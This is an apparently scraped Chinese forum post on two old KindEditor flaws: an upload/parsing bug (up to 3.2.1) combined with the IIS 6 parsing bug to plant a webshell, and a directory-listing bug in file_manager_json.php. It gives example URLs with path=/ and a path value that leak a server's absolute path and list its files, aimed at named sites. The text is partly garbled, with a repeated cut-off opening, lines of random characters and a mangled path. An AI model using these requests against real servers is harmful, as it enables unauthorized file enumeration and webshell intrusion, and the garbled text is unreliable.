KindEditor上传解析漏洞 影响版本:= kindeditor 3.2.1(09年8月份发布的最新版) 漏洞利用:利用windows 2003 IIS解析漏洞拿WEBSHELL KindEditor列目录漏洞 测试版本:KindEditor 3.4.2 KindEditor 3.5.5 1.http://www.political-security.com/67cms/kindeditor/php/file_man
0 R# Q! P" V" P3 k* v* l, L- t: T N) W2 @5 P: b1 K5 x% k
KindEditor上传解析漏洞 影响版本:<= kindeditor 3.2.1(09年8月份发布的最新版) 漏洞利用:利用windows 2003 IIS解析漏洞拿WEBSHELL ; h( J# l, c* V+ | t5 u. @4 I1 z
1 s1 B" k( ?8 y/ E1 F1 dKindEditor列目录漏洞 测试版本:KindEditor 3.4.2 KindEditor 3.5.5 - http://www.political-security.com/67cms/kindeditor/php/file_manager_json.php?path=/
- //path=/,爆出绝对路径D:AppServwww67cmskindeditorphpfile_manager_json.php
- 2.http://netknight.in/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
- //根据爆出的绝对路径,修改path的值为AppServ/www/67cms/
- 这时将遍历d:/AppServ/www/67cms/下的所有文件和文件名
$ y. f7 s( Q. c, V4 v5 d
7 I0 n3 D7 y: K5 b& x% `8 }- T# S; Y9 }: h" `0 f1 i4 \5 s$ U
: Q( K* R& q% O7 u2 E5 f3 e
: S- k9 k. X% u& j) }- k/ i: h+ R7 J1 `; ~
|